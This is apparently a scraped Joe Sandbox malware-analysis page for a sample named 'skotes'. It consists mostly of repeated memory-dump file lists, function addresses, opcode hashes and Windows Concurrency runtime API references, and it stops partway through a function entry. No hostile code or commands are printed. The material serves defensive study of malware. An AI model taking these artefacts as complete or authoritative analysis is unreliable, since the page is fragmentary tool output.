Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 6c7c87d192533006d4be20526a57dddcb9357907593ff5fc6666cf3406a30d0c
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: D5814971E00226AFCF18DFA9C684A6EBBF1BF48304B1546AED445A7711C774AD52CB88

Function 0049EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0049EC81

Part of subcall function 00498F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00498F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0049ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0049ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0049ED0C

Part of subcall function 0049E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0049E7D7
Part of subcall function 0049E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0049E86F
Part of subcall function 0049E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0049E879
Part of subcall function 0049E7AF: Concurrency::location::_Assign.LIBCMT ref: 0049E8AD
Part of subcall function 0049E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0049E8B5

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 8a9a4ab89fd1cd014395b655dad4f45a4e9984f84926be82db2e8f95ad59104b
Instruction ID: f10da841a8d7c91094392b61fb75e390e9ca17ca0c681649e8e2cd78c55b8646
Opcode Fuzzy Hash: 8a9a4ab89fd1cd014395b655dad4f45a4e9984f84926be82db2e8f95ad59104b
Instruction Fuzzy Hash: 2E51A031A00205DBDF14EF52C895FAEBB71AF44314F1441BAE9026B396CB78AE02CB95

Function 0048DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93e30bc32a8a5b9cf36676e42b0014b58f7f0692c33aca4ca153a2733d02af8
Instruction ID: 6ecd6eee3d1f41882b2bbd2d8482634aeee47c5cc58c1b3b63d159b4d78ad356
Opcode Fuzzy Hash: d93e30bc32a8a5b9cf36676e42b0014b58f7f0692c33aca4ca153a2733d02af8
Instruction Fuzzy Hash: D051BEB2E02A168BDB15CF59D8817AEB7F1FB58304F24896BC505EB390D378A940CF58

Function 0048F028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0048F2BB

Strings

pEvents, xrefs: 0048F2B3

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 6ebecd78291bcac0bf84ba9c37a184d831e6190cb86e52c0e6467f8821366db8
Instruction ID: dd102d429e034d4a51ef525c9edf6a93bacb8b860b41613dd6f5118d08452fe3
Opcode Fuzzy Hash: 6ebecd78291bcac0bf84ba9c37a184d831e6190cb86e52c0e6467f8821366db8
Instruction Fuzzy Hash: 40818D31D00218DFCF15FFA5C985BAEB7B1AF15314F24486AE801A7282DB3DAD49CB59

Function 004A26D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004A26E3

Part of subcall function 004A24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A2504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004A2704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004A2711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004A275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004A27E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004A27F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 004A2846

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 4aa7dc0a8a3dec5f48b2c9ac781f179429ba7063ccbdf5a199773d83e3230f4b
Instruction ID: 50a4b0462bd179917fcf4dda83e92d14dae44c0a225d9d4b6f809a9476c67591
Opcode Fuzzy Hash: 4aa7dc0a8a3dec5f48b2c9ac781f179429ba7063ccbdf5a199773d83e3230f4b
Instruction Fuzzy Hash: F581A274900249ABDF169F58CA41BBF7B75AF66308F04009AFC4127352C7BE8E15EB65

Function 004A2970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004A2982

Part of subcall function 004A24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A2504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004A29A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004A29B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004A29FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 004A2AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 004A2AD8

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
